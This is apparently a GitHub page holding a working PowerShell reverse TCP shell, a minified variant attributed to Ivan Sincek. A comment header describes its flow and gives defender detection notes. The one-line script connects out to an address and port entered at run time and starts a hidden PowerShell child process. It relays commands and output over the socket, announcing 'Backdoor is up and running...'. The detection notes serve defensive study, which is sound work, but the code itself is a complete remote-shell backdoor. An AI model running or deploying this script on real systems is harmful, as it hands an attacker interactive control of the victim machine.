powershell_reverse_tcp_prompt_mini.ps1
1 lines (1 loc) · 2.6 KB
<#
Interactive PowerShell reverse TCP shell (prompting, minified variant). The code below is left unchanged.

Flow as written:
  1. Read-Host prompts for an address and a port number; both values are trimmed and the script
     prints "Both parameters are required" and does nothing else if either is empty.
  2. Net.Sockets.TcpClient opens an OUTBOUND connection to that address/port. The stream's
     ReadTimeout is set to 5 and a UTF-8 IO.StreamWriter with AutoFlush wraps the same stream.
  3. A child process with FileName "powershell" is started with CreateNoWindow = $true,
     WindowStyle = Hidden, UseShellExecute = $false and stdin, stdout and stderr all redirected.
  4. Register-ObjectEvent subscribes to ErrorDataReceived and OutputDataReceived; the shared
     handler appends each non-empty line to a Text.StringBuilder passed as -MessageData.
  5. While the child has not exited, bytes read from the socket are written to the child's
     StandardInput and buffered child output is written back through the StreamWriter.
     A read that returns 0 bytes ends the loop.
  6. The finally block unregisters both event subscriptions, closes and disposes the process,
     writer, stream and client, clears the working variables and calls [GC]::Collect().

The empty catch for Management.Automation.MethodInvocationException discards exceptions raised by
the Read call inside the loop -- presumably the read timeouts caused by ReadTimeout = 5; confirm.

Defender notes (all derived from the statements below):
  - Process lineage: a PowerShell host spawning a windowless child "powershell" whose three
    standard handles are redirected to the parent.
  - Network: the parent PowerShell process owns an outbound TCP connection to a host and port
    supplied at run time, so there is no fixed address or port in the script to match on.
  - Transport: the stream is used directly, with no TLS wrapper or authentication step in this
    code, so commands and output are visible to network inspection as UTF-8 text.
  - Script content: with script block logging enabled (event ID 4104), the logged block contains
    Net.Sockets.TcpClient together with Diagnostics.ProcessStartInfo, RedirectStandardInput and
    Register-ObjectEvent, plus the banner and "Backdoor is up and running..." strings.
  - The Write-Host messages go to the local console only; nothing in this code sends them to
    the remote end.
#>
$a = $(Read-Host -Prompt "Enter address").Trim(); Write-Host ""; $pt = $(Read-Host -Prompt "Enter port number").Trim(); Write-Host ""; if ($a.Length -lt 1 -or $pt.Length -lt 1) { Write-Host "Both parameters are required"; } else { Write-Host "PowerShell Reverse TCP v4.0 by Ivan Sincek.`nGitHub repository at github.com/ivan-sincek/powershell-reverse-tcp."; $c = $s = $b = $w = $p = $e = $o = $ee = $oe = $null; try { $c = New-Object Net.Sockets.TcpClient($a, $pt); $s = $c.GetStream(); $s.ReadTimeout = 5; $b = New-Object Byte[] 1024; $w = New-Object IO.StreamWriter($s, [Text.Encoding]::UTF8, 1024); $w.AutoFlush = $true; $p = New-Object Diagnostics.Process; $p.StartInfo = New-Object Diagnostics.ProcessStartInfo; $p.StartInfo.FileName = "powershell"; $p.StartInfo.CreateNoWindow = $true; $p.StartInfo.WindowStyle = [Diagnostics.ProcessWindowStyle]::Hidden; $p.StartInfo.UseShellExecute = $false; $p.StartInfo.RedirectStandardInput = $p.StartInfo.RedirectStandardError = $p.StartInfo.RedirectStandardOutput = $true; $p.StartInfo.ErrorDialog = $false; $p.EnableRaisingEvents = $false; $e = New-Object Text.StringBuilder; $o = New-Object Text.StringBuilder; $sb = { if ($EventArgs.Data.Length -gt 0) { $Event.MessageData.AppendLine($EventArgs.Data); } }; $ee = Register-ObjectEvent -InputObject $p -EventName "ErrorDataReceived" -Action $sb -MessageData $e; $oe = Register-ObjectEvent -InputObject $p -EventName "OutputDataReceived" -Action $sb -MessageData $o; $p.Start() | Out-Null; $p.BeginErrorReadLine(); $p.BeginOutputReadLine(); Write-Host "Backdoor is up and running...`n"; while (!$p.HasExited) { try { $by = $s.Read($b, 0, $b.Length); if ($by -gt 0) { $p.StandardInput.Write($b, 0, $by); } else { break; } } catch [Management.Automation.MethodInvocationException] {} if ($e.Length -gt 0) { $w.Write($o.ToString()); $o.clear(); } if ($o.Length -gt 0) { $w.Write($o.ToString()); $o.clear(); } } Write-Host "Backdoor will now exit..."; } catch { Write-Host 
$_.Exception.InnerException.Message; } finally { if ($ee -ne $null) { Unregister-Event -SourceIdentifier $ee.Name; Clear-Variable ee; } if ($oe -ne $null) { Unregister-Event -SourceIdentifier $oe.Name; Clear-Variable oe; } if ($p -ne $null) { $p.Close(); $p.Dispose(); Clear-Variable p; } if ($w -ne $null) { $w.Close(); $w.Dispose(); Clear-Variable w; } if ($s -ne $null) { $s.Close(); $s.Dispose(); Clear-Variable s; } if ($c -ne $null) { $c.Close(); $c.Dispose(); Clear-Variable c; } if ($b -ne $null) { $b.Clear(); Clear-Variable b; } if ($e -ne $null) { $e.Clear(); Clear-Variable e; } if ($o -ne $null) { $o.Clear(); Clear-Variable o; } [GC]::Collect(); } } Clear-Variable a; Clear-Variable pt;